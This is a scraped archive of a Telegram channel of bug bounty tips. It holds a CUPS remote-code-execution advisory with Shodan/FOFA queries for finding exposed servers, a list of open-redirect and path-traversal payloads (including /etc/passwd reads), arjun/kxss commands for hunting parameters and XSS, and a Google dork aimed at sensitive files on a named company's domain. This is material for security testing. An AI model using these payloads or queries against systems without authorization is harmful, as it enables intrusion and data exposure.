uz
Feedback
Bug bounty Tips

Bug bounty Tips

Kanalga Telegram’da oā€˜tish

šŸ›”ļø Cybersecurity enthusiast | šŸ’» Helping secure the digital world | 🌐 Web App Tester | šŸ•µļøā€ā™‚ļø OSINT Specialist Admin: @laazy_hack3r

Ko'proq ko'rsatish
6 129
Obunachilar
+1424 soatlar
+1047 kunlar
+34830 kunlar
Postlar arxiv
CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution A remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer). PoC: https://github.com/RickdeJager/cupshax This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network. CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1 Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8 Search Query:
HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"
P.S. 2.9M+ Services are found on hunter.how yearly

Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things o
Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things on how it really works...

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

For finding hidden parameter: arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10  --headers "User-Agent: Mozilla/5.0"

For finding hidden parameter: arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10  --headers "User-Agent: Mozilla/5.0"

photo content

Rufus - Create bootable USB drives the easy way https://rufus.ie/en/

GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856) https://github.com/securelayer7/CVE-2024-38856_Scanner

try this google dork to find senstive files on website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

ā˜„ļøSubowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Az
ā˜„ļøSubowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc. 🚨https://github.com/ifconfig-me/subowner

The Top Hacker Methodologies.pdf5.92 KB

āŽ Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap

šŸ’  Introduction to SQL Injection šŸ”— https://hacklido.com/blog/910-introduction-to-sql-injection

Top Hacking Books for 2024 (plus Resources): FREE and Paid Tue, 17 Sep 2024 12:56:36 GMT https://medium.com/p/394601c01904